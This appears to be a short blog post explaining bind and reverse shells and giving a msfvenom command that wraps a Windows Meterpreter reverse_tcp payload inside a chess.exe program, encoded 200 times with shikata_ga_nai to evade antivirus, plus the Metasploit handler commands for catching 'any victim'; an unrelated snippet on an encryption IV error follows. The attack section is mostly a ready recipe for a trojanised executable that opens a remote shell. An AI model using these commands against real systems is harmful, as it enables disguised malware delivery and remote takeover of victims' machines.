msfvenom creating a reverse shell and evading payload from av



There are two types of shell namely bind and reverse shell. Bind shell creates a new service  and attacker connect to this service.

Reverse shell on the other hand, is triggered by the user while an attacker runs some listener and target machine.

msfvenom allows hacker to create / re-create a payload and hide it from AV detection.


The command below, hides our payload / attack using reverse_tcp using an encoder called shikata_ga_nai into a file called chess.exe.



msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

To listen to any victim, we will issue the following commands :-


msf >use exploit/multi/handler

 msf > set payload windows/meterpreter/reverse_tcp





Comments

Post a Comment

Popular posts from this blog

The specified initialization vector (IV) does not match the block size for this algorithm

Image
If you're getting  exception when trying to assigned key to a symmetric key and getting error message below :- The specified initialization vector (IV) does not match the block size for this algorithm And your code probably look like something below :- Then you need to go into debug mode and start looking into the supported size for IV as shown in diagram below :- As you can see, IV is 16 bytes, so you need to provide 16 bytes. The same goes for Key field too, if you're adding anything to it. As long as you provide a valid key size, then we're good and you're code will be ready.
Read more